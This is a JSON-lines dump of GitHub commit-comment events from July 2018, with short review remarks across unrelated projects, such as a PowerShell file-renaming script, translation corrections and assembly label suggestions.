{"id":"7903651309","type":"CommitCommentEvent","actor":{"login":"atiq-cs"},"repo":{"name":"atiq-cs/Problem-Solving"},"payload":{"comment":{"id":29559417,"position":null,"line":null,"path":null,"commit_id":"824485c25c80b762d6e40c5bcf9c0f3b6a326e25","created_at":"2018-07-01T20:45:27Z","updated_at":"2018-07-01T20:45:27Z","author_association":"OWNER","body":"Example script in powershell that did it,\r\n\r\n    $Ext='.cs'\r\n    Write-Host \"Renaming $Ext files using git,\"\r\n    Get-ChildItem general-solving\\leetcode\\*$Ext | %{\r\n        $filename = [string] $_.BaseName\r\n        $newFilename = $filename -replace '^(\\d\\d\\d_.*)$','0$1'\r\n        if ($filename -eq $newFilename) {\r\n          Write-Host \"Source and dest are same for `\"$filename$Ext`\"\"\r\n        }\r\n        else {\r\n          Write-Host \"`\"$filename$Ext`\" -> `\"$newFilename$Ext`\"\"\r\n          git mv \"general-solving/leetcode/$filename$Ext\" \"general-solving/leetcode/$newFilename$Ext\"\r\n        }\r\n    }\r\n"}},"created_at":"2018-07-01T20:45:27Z"}
{"id":"7903651624","type":"CommitCommentEvent","actor":{"login":"koppen"},"repo":{"name":"substancelab/rconomic"},"payload":{"comment":{"id":29559419,"position":null,"line":null,"path":null,"commit_id":"b4286201babf0ffd35c4530b063454cfb49c09bf","created_at":"2018-07-01T20:45:41Z","updated_at":"2018-07-01T20:45:41Z","author_association":"MEMBER","body":"I have just pushed version 0.6.1 to RubyGems, which locks down on our dependency on Savon to a version that matches our monkeypatch (ie < 2.11.2).\r\n\r\nThis is just a stopgap measure, though, and 0.7.0 is going to go out shortly, which removes the ability to connect with credentials entirely.\r\n\r\nSo in short, if you need to use the gem v0.7.0 (and token connection) is going to be the version to use. v0.6.1 is for those of you who need the ability to connect with credentials and somehow can make the API accept that."}},"created_at":"2018-07-01T20:45:41Z"}
{"id":"7903652429","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29559421,"position":null,"line":null,"path":null,"commit_id":"d404b5e25593e3c9de40e02b1c4cf934c5bb61e4","created_at":"2018-07-01T20:46:16Z","updated_at":"2018-07-01T20:46:16Z","author_association":"MEMBER","body":"The AppVeyor build failure for this change looks legit."}},"created_at":"2018-07-01T20:46:16Z"}
{"id":"7903653848","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559423,"position":208,"line":3035,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T20:47:23Z","updated_at":"2018-07-01T20:47:23Z","author_association":"MEMBER","body":"The card data actually comes from the wLoadedCard1 buffer here. While register a does have the correct number it is irrelevant from the moment this function is called."}},"created_at":"2018-07-01T20:47:23Z"}
{"id":"7903654692","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559424,"position":129,"line":1746,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T20:48:04Z","updated_at":"2018-07-01T20:48:04Z","author_association":"MEMBER","body":"``DECK_SIZE``"}},"created_at":"2018-07-01T20:48:04Z"}
{"id":"7903655802","type":"CommitCommentEvent","actor":{"login":"kain88-de"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":29559425,"position":13,"line":102,"path":"package/MDAnalysis/lib/_cutil.pyx","commit_id":"34b79fed8d854dae640bc8e04dd5207c27219d40","created_at":"2018-07-01T20:48:54Z","updated_at":"2018-07-01T20:48:54Z","author_association":"MEMBER","body":"please check the abs version used in the c++ code! It should read `std::abs()` to correctly handle floats and doubles."}},"created_at":"2018-07-01T20:48:54Z"}
{"id":"7903657392","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559426,"position":126,"line":126,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:49:51Z","updated_at":"2018-07-01T20:49:51Z","author_association":"COLLABORATOR","body":"* globálně\r\n2x * konkrétní\r\n* specifické"}},"created_at":"2018-07-01T20:49:51Z"}
{"id":"7903658389","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559429,"position":134,"line":134,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:50:34Z","updated_at":"2018-07-01T20:50:34Z","author_association":"COLLABORATOR","body":"Veškeré změny, které provedete bude mít za následek = Veškeré změny, které provedete budou mít za následek"}},"created_at":"2018-07-01T20:50:34Z"}
{"id":"7903659148","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559430,"position":144,"line":144,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:51:09Z","updated_at":"2018-07-01T20:51:09Z","author_association":"COLLABORATOR","body":"příponou"}},"created_at":"2018-07-01T20:51:09Z"}
{"id":"7903659252","type":"CommitCommentEvent","actor":{"login":"kimdhamilton"},"repo":{"name":"w3c-ccg/meetings"},"payload":{"comment":{"id":29559433,"position":null,"line":null,"path":null,"commit_id":"6b3ab11c6de6ed72b4cc0139b0f97c6e13dacb3c","created_at":"2018-07-01T20:51:13Z","updated_at":"2018-07-01T20:51:13Z","author_association":"CONTRIBUTOR","body":"thanks. Having to type `JohnJordan:` was really grating on me. So much easier to type `DKVxG2fXXTU8yT5N7hGEbXB3dfdAnYv1JczDUHpmDxya`:"}},"created_at":"2018-07-01T20:51:13Z"}
{"id":"7903660806","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559438,"position":204,"line":204,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:52:31Z","updated_at":"2018-07-01T20:52:31Z","author_association":"COLLABORATOR","body":"Vybrané styly"}},"created_at":"2018-07-01T20:52:31Z"}
{"id":"7903661371","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559440,"position":206,"line":206,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:53:00Z","updated_at":"2018-07-01T20:53:00Z","author_association":"COLLABORATOR","body":"??"}},"created_at":"2018-07-01T20:53:00Z"}
{"id":"7903661645","type":"CommitCommentEvent","actor":{"login":"sophiathekitty"},"repo":{"name":"sophiathekitty/IdleTask"},"payload":{"comment":{"id":29559441,"position":null,"line":null,"path":null,"commit_id":"b3dbcea503da3d875332ad137147bdf19465fc20","created_at":"2018-07-01T20:53:13Z","updated_at":"2018-07-01T20:53:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [clicker action](https://trello.com/c/JxfF5r8i/6-clicker-action)"}},"created_at":"2018-07-01T20:53:13Z"}
{"id":"7903662350","type":"CommitCommentEvent","actor":{"login":"sophiathekitty"},"repo":{"name":"sophiathekitty/IdleTask"},"payload":{"comment":{"id":29559444,"position":null,"line":null,"path":null,"commit_id":"08823e4f1521fb487d284c50b91f429210c2b647","created_at":"2018-07-01T20:53:44Z","updated_at":"2018-07-01T20:53:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [simple stats system](https://trello.com/c/jgPqnS3g/4-simple-stats-system)"}},"created_at":"2018-07-01T20:53:44Z"}
{"id":"7903662536","type":"CommitCommentEvent","actor":{"login":"sophiathekitty"},"repo":{"name":"sophiathekitty/IdleTask"},"payload":{"comment":{"id":29559445,"position":null,"line":null,"path":null,"commit_id":"b3dbcea503da3d875332ad137147bdf19465fc20","created_at":"2018-07-01T20:53:53Z","updated_at":"2018-07-01T20:53:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [simple stats system](https://trello.com/c/jgPqnS3g/4-simple-stats-system)"}},"created_at":"2018-07-01T20:53:53Z"}
{"id":"7903662682","type":"CommitCommentEvent","actor":{"login":"Egogor123"},"repo":{"name":"pambuvss/jetRubyProject"},"payload":{"comment":{"id":29559446,"position":null,"line":null,"path":null,"commit_id":"6134b4826cc79eef9879aad1f9a7a7f8dbb6d2e4","created_at":"2018-07-01T20:54:00Z","updated_at":"2018-07-01T20:54:00Z","author_association":"COLLABORATOR","body":"export RECAPTCHA_SITE_KEY=6LcwpGEUAAAAAO_NIpJPX54BrGbjHd4DDq4YoQFq    VSEM PROPISAT' eto v consloe . bez nichego tol'ko etu stroku . zaiti v papku i propisat'/"}},"created_at":"2018-07-01T20:54:00Z"}
{"id":"7903663075","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559447,"position":201,"line":201,"path":"czech/admin/user_groups.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:54:18Z","updated_at":"2018-07-01T20:54:18Z","author_association":"COLLABORATOR","body":"Vložené"}},"created_at":"2018-07-01T20:54:18Z"}
{"id":"7903664639","type":"CommitCommentEvent","actor":{"login":"rlim406"},"repo":{"name":"rlim406/Bootstrap-Portfolio"},"payload":{"comment":{"id":29559452,"position":null,"line":null,"path":null,"commit_id":"d0998c70e147d9f83189c16b7e8dcf98181090a0","created_at":"2018-07-01T20:55:35Z","updated_at":"2018-07-01T20:55:35Z","author_association":"OWNER","body":"final commit "}},"created_at":"2018-07-01T20:55:35Z"}
{"id":"7903666641","type":"CommitCommentEvent","actor":{"login":"dkomanov"},"repo":{"name":"wix/wix-http-testkit"},"payload":{"comment":{"id":29559456,"position":4,"line":20,"path":"http-testkit-marshaller-jackson/src/main/scala/com/wix/e2e/http/json/JsonJacksonMarshaller.scala","commit_id":"65ad472f40f4444d518cd5e975551138e8a26adb","created_at":"2018-07-01T20:57:10Z","updated_at":"2018-07-01T20:57:10Z","author_association":"CONTRIBUTOR","body":"How does it allows external configuration of ObjectMapper? It's not used."}},"created_at":"2018-07-01T20:57:10Z"}
{"id":"7903666650","type":"CommitCommentEvent","actor":{"login":"RipperDrone"},"repo":{"name":"bitdump/BLHeli"},"payload":{"comment":{"id":29559457,"position":null,"line":null,"path":null,"commit_id":"39e799578e23b8c8a4cb47e9a1e4c1243c53326d","created_at":"2018-07-01T20:57:10Z","updated_at":"2018-07-01T20:57:10Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/12601105/42138708-14d08574-7d82-11e8-8b6c-5de401fab4a0.png)\r\n"}},"created_at":"2018-07-01T20:57:10Z"}
{"id":"7903666681","type":"CommitCommentEvent","actor":{"login":"rlim406"},"repo":{"name":"rlim406/Bootstrap-Portfolio"},"payload":{"comment":{"id":29559458,"position":null,"line":null,"path":null,"commit_id":"d0998c70e147d9f83189c16b7e8dcf98181090a0","created_at":"2018-07-01T20:57:12Z","updated_at":"2018-07-01T20:57:12Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-01T20:57:12Z"}
{"id":"7903667553","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29559459,"position":143,"line":143,"path":"czech/admin/style_themes.lang.php","commit_id":"60b4d00b08cd00e9535e0dfe827eacdb7ade1c2e","created_at":"2018-07-01T20:57:53Z","updated_at":"2018-07-01T20:57:53Z","author_association":"COLLABORATOR","body":"souboru"}},"created_at":"2018-07-01T20:57:53Z"}
{"id":"7903667692","type":"CommitCommentEvent","actor":{"login":"Daemon712"},"repo":{"name":"JavaZenTeam/IgorBot"},"payload":{"comment":{"id":29559461,"position":31,"line":31,"path":"src/main/java/ru/javazen/telegram/bot/security/authentication/AuthenticationTokenFilter.java","commit_id":"fc0d74fee32b3c5ca8397282841f1ff0ae2fa6a2","created_at":"2018-07-01T20:57:58Z","updated_at":"2018-07-01T20:57:58Z","author_association":"CONTRIBUTOR","body":"Лучше бы шаблон вынести в конфигурацию  "}},"created_at":"2018-07-01T20:57:58Z"}
{"id":"7903669101","type":"CommitCommentEvent","actor":{"login":"dongli"},"repo":{"name":"dongli/fortran-unit-test"},"payload":{"comment":{"id":29559466,"position":null,"line":null,"path":null,"commit_id":"28142e9b805433dd5bb7ae562e469cfc8a68747e","created_at":"2018-07-01T20:59:02Z","updated_at":"2018-07-01T20:59:02Z","author_association":"OWNER","body":"@JHenneberg These days I am testing (struggling) with different compilers, and it seems that PGI compiler does not behave like GFortran, such as on optional arguments. In some cases, the direct passing of optional arguments to other procedures will cause segmentation fault. Also the use of `merge` cause problem. But I just changed the two arguments optional, tested in Linux container with PGI, and it looks good. So let them be optional~ Could you help to test in your environment? Thanks!"}},"created_at":"2018-07-01T20:59:02Z"}
{"id":"7903669521","type":"CommitCommentEvent","actor":{"login":"dcnb"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29559468,"position":null,"line":null,"path":null,"commit_id":"0b2f1ac4d4bc4d70b5c697ba14bf240f51864c23","created_at":"2018-07-01T20:59:20Z","updated_at":"2018-07-01T20:59:20Z","author_association":"COLLABORATOR","body":"I don't find it very important\r\n"}},"created_at":"2018-07-01T20:59:20Z"}
{"id":"7903672336","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"aaaaeinai/niyahi_community_content"},"payload":{"comment":{"id":29559479,"position":null,"line":null,"path":null,"commit_id":"4cfa2849c92663f1146b32031badd2d36188517d","created_at":"2018-07-01T21:01:09Z","updated_at":"2018-07-01T21:01:09Z","author_association":"NONE","body":"who are u. what are u doing to my bot. let me see my kids. ANSWER ME"}},"created_at":"2018-07-01T21:01:09Z"}
{"id":"7903672733","type":"CommitCommentEvent","actor":{"login":"succkarz"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559480,"position":null,"line":null,"path":null,"commit_id":"8b8245d7aae2e99ada8b1bf9d32acf4ef2395f1b","created_at":"2018-07-01T21:01:23Z","updated_at":"2018-07-01T21:01:23Z","author_association":"NONE","body":"> I can run it on windows, but I cannot run it on cloud server with centos. I have waited for 10minutes\r\n\r\nWorks with Ec2 instance of ubuntu 16.04"}},"created_at":"2018-07-01T21:01:23Z"}
{"id":"7903672858","type":"CommitCommentEvent","actor":{"login":"koredetoy"},"repo":{"name":"koredetoy/Quiz-App"},"payload":{"comment":{"id":29559482,"position":1,"line":1,"path":"README.md","commit_id":"1337739c49845d2ecab233c7bd1a5882f03b415e","created_at":"2018-07-01T21:01:30Z","updated_at":"2018-07-01T21:01:30Z","author_association":"OWNER","body":"Link to apk folder on google\r\nhttps://drive.google.com/drive/folders/1KX2Ek2PhhB8diOJOGAgSmQQMfxHXdL7Q?usp=sharing"}},"created_at":"2018-07-01T21:01:30Z"}
{"id":"7903673206","type":"CommitCommentEvent","actor":{"login":"jermar"},"repo":{"name":"HelenOS/helenos"},"payload":{"comment":{"id":29559484,"position":4,"line":219,"path":"tools/ew.py","commit_id":"2fc9bfdff4f7f7961c56c7e4f3521ee05f4582e8","created_at":"2018-07-01T21:01:48Z","updated_at":"2018-07-01T21:01:48Z","author_association":"MEMBER","body":"I think this breaks architectures like sun4v that already use -serial stdio. QEMU then complains about two -serial stdio options."}},"created_at":"2018-07-01T21:01:48Z"}
{"id":"7903673453","type":"CommitCommentEvent","actor":{"login":"favourOpara"},"repo":{"name":"favourOpara/Favour"},"payload":{"comment":{"id":29559486,"position":3,"line":3,"path":"README.md","commit_id":"ddc981765cf6459fed5903efe3c843e51fb1de4c","created_at":"2018-07-01T21:01:56Z","updated_at":"2018-07-01T21:01:56Z","author_association":"OWNER","body":"<!DOCTYPE html>"}},"created_at":"2018-07-01T21:01:56Z"}
{"id":"7903676201","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559492,"position":363,"line":3466,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:04:04Z","updated_at":"2018-07-01T21:04:04Z","author_association":"MEMBER","body":"``ldtx de, Text00f8`` (whatever that is)"}},"created_at":"2018-07-01T21:04:04Z"}
{"id":"7903676876","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"spgennard/vscode_cobol"},"payload":{"comment":{"id":29559493,"position":62,"line":110,"path":"README.md","commit_id":"b0ff278fe6ffa8e5e790519b2d4a0af30488eaf9","created_at":"2018-07-01T21:04:35Z","updated_at":"2018-07-01T21:04:35Z","author_association":"CONTRIBUTOR","body":"superfluous brace?"}},"created_at":"2018-07-01T21:04:35Z"}
{"id":"7903680230","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559495,"position":642,"line":3803,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:07:09Z","updated_at":"2018-07-01T21:07:09Z","author_association":"MEMBER","body":"``and CNF_SLP_PRZ``\r\n``cp CONFUSED``"}},"created_at":"2018-07-01T21:07:09Z"}
{"id":"7903681535","type":"CommitCommentEvent","actor":{"login":"evanwill"},"repo":{"name":"uidaholib/main-web-redesign_draft"},"payload":{"comment":{"id":29559497,"position":null,"line":null,"path":null,"commit_id":"0b2f1ac4d4bc4d70b5c697ba14bf240f51864c23","created_at":"2018-07-01T21:08:03Z","updated_at":"2018-07-01T21:08:03Z","author_association":"MEMBER","body":"i suppose not if you don't really want to access any of the other buttons on the page and all... "}},"created_at":"2018-07-01T21:08:03Z"}
{"id":"7903684222","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559507,"position":743,"line":3904,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:10:08Z","updated_at":"2018-07-01T21:10:08Z","author_association":"MEMBER","body":"I guess you forgot to change ``AIAction_`` to ``AI`` in the next two? That said, it could be better to keep the ``AIAction_`` prefix even in labeled ones for clarity/visibility."}},"created_at":"2018-07-01T21:10:08Z"}
{"id":"7903684470","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559508,"position":40,"line":394,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:10:17Z","updated_at":"2018-07-01T21:10:17Z","author_association":"COLLABORATOR","body":"Мб \"проигнорировать\"?"}},"created_at":"2018-07-01T21:10:17Z"}
{"id":"7903685266","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29559510,"position":12,"line":12,"path":"src/week05/tests/TaskG01_07_Merge_sorted_arraysTest.java","commit_id":"de41d833c3c7b09b11a71ae0767b890e4e034883","created_at":"2018-07-01T21:10:53Z","updated_at":"2018-07-01T21:10:53Z","author_association":"COLLABORATOR","body":"Correct."}},"created_at":"2018-07-01T21:10:53Z"}
{"id":"7903685483","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559511,"position":61,"line":406,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:11:06Z","updated_at":"2018-07-01T21:11:06Z","author_association":"COLLABORATOR","body":"Я бы писал segwit-адреса через дефис и не с заглавной"}},"created_at":"2018-07-01T21:11:06Z"}
{"id":"7903685719","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29559512,"position":7,"line":15,"path":"Task.iml","commit_id":"de41d833c3c7b09b11a71ae0767b890e4e034883","created_at":"2018-07-01T21:11:15Z","updated_at":"2018-07-01T21:11:15Z","author_association":"COLLABORATOR","body":"could be an option. \r\nbut you'd better to use pom.xml dependencies instead"}},"created_at":"2018-07-01T21:11:15Z"}
{"id":"7903686045","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29559513,"position":9,"line":9,"path":"src/week05/tests/TaskG01_07_Merge_sorted_arraysTest.java","commit_id":"de41d833c3c7b09b11a71ae0767b890e4e034883","created_at":"2018-07-01T21:11:30Z","updated_at":"2018-07-01T21:11:30Z","author_association":"COLLABORATOR","body":"correct"}},"created_at":"2018-07-01T21:11:30Z"}
{"id":"7903686280","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559515,"position":772,"line":3933,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:11:41Z","updated_at":"2018-07-01T21:11:41Z","author_association":"MEMBER","body":"``and CNF_SLP_PRZ``\r\n``cp CONFUSED``"}},"created_at":"2018-07-01T21:11:41Z"}
{"id":"7903686787","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559517,"position":64,"line":408,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:12:07Z","updated_at":"2018-07-01T21:12:07Z","author_association":"COLLABORATOR","body":"Тут надо \"был обнаружен\" скорее, суть в том-то, что пользователь палит свой приватный ключ в буфере. Кстати, ключ будем называть приватным или секретным?"}},"created_at":"2018-07-01T21:12:07Z"}
{"id":"7903686949","type":"CommitCommentEvent","actor":{"login":"Siaukovich"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29559518,"position":94,"line":94,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-01T21:12:14Z","updated_at":"2018-07-01T21:12:14Z","author_association":"OWNER","body":"С epsilon <= 0 согласен, но погрешность ведь может быть и больше 1"}},"created_at":"2018-07-01T21:12:14Z"}
{"id":"7903689100","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559523,"position":84,"line":419,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:13:45Z","updated_at":"2018-07-01T21:13:45Z","author_association":"COLLABORATOR","body":"Слитно"}},"created_at":"2018-07-01T21:13:45Z"}
{"id":"7903690437","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559527,"position":110,"line":433,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:14:48Z","updated_at":"2018-07-01T21:14:48Z","author_association":"COLLABORATOR","body":"С переводом batch нужно поосторожнее. \"Групповая трата\" создаёт впечатление, что мы все скидываемся на что-то"}},"created_at":"2018-07-01T21:14:48Z"}
{"id":"7903691621","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29559531,"position":113,"line":435,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-01T21:15:39Z","updated_at":"2018-07-01T21:15:39Z","author_association":"COLLABORATOR","body":"Тут значит \"Поставьте тут галку, чтобы не получать предупреждения о повторных отправлеиях на этот адрес.\""}},"created_at":"2018-07-01T21:15:39Z"}
{"id":"7903692472","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559532,"position":12,"line":388,"path":"src/text/text1.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:16:16Z","updated_at":"2018-07-01T21:16:16Z","author_association":"MEMBER","body":"Not a big deal but I think I'd just make text labels as literal as possible to the text unless they would be too long, just to make it clear what the text is at first glance and because there are a few similar texts that might be confusing otherwise. As in ``RetreatedToTheBenchText``, ``RetreatWasUnsuccessfulText``, etc. Again, no big deal at all, just the way I've been doing it myself."}},"created_at":"2018-07-01T21:16:16Z"}
{"id":"7903693427","type":"CommitCommentEvent","actor":{"login":"aspiringAndroidDev"},"repo":{"name":"aspiringAndroidDev/QuizApp"},"payload":{"comment":{"id":29559534,"position":null,"line":null,"path":null,"commit_id":"95e12cd9a6de43f73d7f4b886129d1ebc439d11c","created_at":"2018-07-01T21:16:58Z","updated_at":"2018-07-01T21:16:58Z","author_association":"OWNER","body":"APK https://drive.google.com/open?id=1bR3AFSZjN_DyvrTLD72kYGMUT94Tc1-K"}},"created_at":"2018-07-01T21:16:58Z"}
{"id":"7903697210","type":"CommitCommentEvent","actor":{"login":"yumarfaruk"},"repo":{"name":"yumarfaruk/UdacityFoodandSportQuiz"},"payload":{"comment":{"id":29559537,"position":4,"line":4,"path":"README.md","commit_id":"400c31b40277aee586384f295fee51528229f238","created_at":"2018-07-01T21:19:42Z","updated_at":"2018-07-01T21:19:42Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1FbBgf3et1XHhuVlXVfabSl6xN-uHVvVp/view?usp=drivesdk.  Link to apk on my google drive. "}},"created_at":"2018-07-01T21:19:42Z"}
{"id":"7903708876","type":"CommitCommentEvent","actor":{"login":"DavidGDL"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29559547,"position":null,"line":null,"path":null,"commit_id":"ddc26bfd522dc9352455235775d6754755ce134a","created_at":"2018-07-01T21:28:17Z","updated_at":"2018-07-01T21:28:17Z","author_association":"NONE","body":"If you have an issue finding what files were modified from a previous version, or you have a typo in your code while linking datatable to your project, please look upon these two files: bundleconfig.cs and views/shared/layout.cshtml. You have to set the bundles correctly! \r\n\r\nGood luck !\r\n"}},"created_at":"2018-07-01T21:28:17Z"}
{"id":"7903708996","type":"CommitCommentEvent","actor":{"login":"anlewis"},"repo":{"name":"anlewis/therapy-track-vue"},"payload":{"comment":{"id":29559548,"position":5,"line":26,"path":"src/components/Nav.vue","commit_id":"40875464b94faffd4ed9e334716eb8d63fa0c60a","created_at":"2018-07-01T21:28:22Z","updated_at":"2018-07-01T21:28:22Z","author_association":"OWNER","body":"What is happening?"}},"created_at":"2018-07-01T21:28:22Z"}
{"id":"7903710169","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559551,"position":12,"line":388,"path":"src/text/text1.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:29:06Z","updated_at":"2018-07-01T21:29:06Z","author_association":"MEMBER","body":"That's definitely fine. Either one of us can change these whenever we do something next"}},"created_at":"2018-07-01T21:29:06Z"}
{"id":"7903710620","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559553,"position":129,"line":1746,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:29:24Z","updated_at":"2018-07-01T21:29:24Z","author_association":"MEMBER","body":"Nice catch"}},"created_at":"2018-07-01T21:29:24Z"}
{"id":"7903713718","type":"CommitCommentEvent","actor":{"login":"JacobCallahan"},"repo":{"name":"JacobCallahan/robozilla"},"payload":{"comment":{"id":29559561,"position":17,"line":195,"path":"robozilla/decorators/__init__.py","commit_id":"97c348ef375008c614e26a64ca0dd62345b0fb4f","created_at":"2018-07-01T21:31:36Z","updated_at":"2018-07-01T21:31:36Z","author_association":"OWNER","body":"added this since many example bugs don't have the target_milestone field. so we'd get key errors here."}},"created_at":"2018-07-01T21:31:36Z"}
{"id":"7903714066","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29559562,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-01T21:31:51Z","updated_at":"2018-07-01T21:31:51Z","author_association":"NONE","body":"Just wanted to say thanks @F43nd1r for supporting the 4.x series with modern API support, I have a port to 5.x ready for AnkiDroid but our minSdkVersion is 15, so the apparent ACRA 5.x requirement of a minSdkVersion of 26 is unsupportable for us."}},"created_at":"2018-07-01T21:31:51Z"}
{"id":"7903714286","type":"CommitCommentEvent","actor":{"login":"dannye"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":29559563,"position":208,"line":3035,"path":"src/engine/bank01.asm","commit_id":"95bf272278db81b661942f05916ae5c00d71d207","created_at":"2018-07-01T21:32:02Z","updated_at":"2018-07-01T21:32:02Z","author_association":"MEMBER","body":"I see. Looks like you're right. I must have gotten myself confused"}},"created_at":"2018-07-01T21:32:02Z"}
